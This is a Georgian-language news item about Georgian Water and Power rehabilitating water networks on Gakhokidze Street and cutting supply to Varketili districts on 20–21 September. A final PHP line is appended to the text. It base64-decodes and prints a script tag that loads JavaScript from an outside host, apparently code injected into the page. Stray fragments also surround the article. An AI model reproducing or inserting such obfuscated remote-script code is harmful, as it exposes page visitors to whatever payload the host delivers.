celsiusi
ავერსი შნაიდერი

 ჯორჯიან უოთერ ენდ ფაუერი 2024 წლის საინვესტიციო გეგმის ერთ-ერთ ყველაზე მსხვილ და მნიშვნელოვან პროექტს - გახოკიძის ქუჩის წყალმომარაგების ქსელების რეაბილიტაციას აქტიურად ახორციელებს. 

სამუშაოების მიმდინარე ეტაპზე უკვე განახლდა 2 კილომეტრზე მეტი სიგრძის წყალმომარაგებისა და 700 მეტრი სიგრძის  წყალარინების ქსელები, მოეწყო 30 ერთეული ჩამკეტ-მარეგულირებელი ურდული და დამონტაჟდა 4  სახანძრო ჰიდრანტი.

ახლად მოწყობილი ქსელის ექსპლუატაციაში შესვლის მიზნით ჯივიპი გადაერთებით სამუშაოებს ხვალ, 20 სექტემბერს დილის 10:00 საათზე დაიწყებს და მთელი დღის  განმავლობაში 18  სხვადასხვა ლოკაციაზე აქტიურ რეჟიმში შეასრულებს.

აღნიშნულთან დაკავშირებით აუცილებელია მაგისტრალური ქსელის წყლისგან დაცლა რის გამოც ხვალ, 20 სექტემბერს დილის 10:00 საათიდან 21 სექტემბრის დილის 08:00 საათამდე  წყალმომარაგება შეეზღუდება:

ვარკეთილი 3-ის I, II, III, IIIა, IV მიკრორაიონებს, ვარკეთილი 2-ს, საქართველოს ერთიანობისთვის მებრძოლთა ქუჩას, სუხიშვილის, რაფაელ დვალის, თაყაიშვილის, დიმიტრი ალექსიძის, ნიკოლოზ ლანდიას, ვიქტორ კუპრაძის, სადგერის, ყადირ შერვაშიძის, აკაკი ჩხენკელის, ოჯალეშის, ლადო კოტეტიშვილისა და რწმენის ქუჩებს.

ჯორჯიან უოთერ ენდ ფაუერი ბოდიშს უხდის მომხმარებლებს დისკომფორტისთვის. სამუშაოების მიმდინარეობის პერიოდში, წყალმომარაგების სრულად აღდგენამდე, კომპანია მოსახლეობას სასმელ წყალს ცისტერნებით მიაწვდის.

წყალმომარაგების შეზღუდვისა და აღდგენის შესახებ ინფორმაციას, ჯორჯიან უოთერ ენდ ფაუერი აბონენტებს წინასწარ, SMS-შეტყობინების სახით უგზავნის. დეტალური ინფორმაციის მოძიება შესაძლებელია კომპანიის ცხელი ხაზის - 2 93 11 11, ფეისბუქისა და ვებგვერდის მეშვეობითhttp://www.gwp.ge

79
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");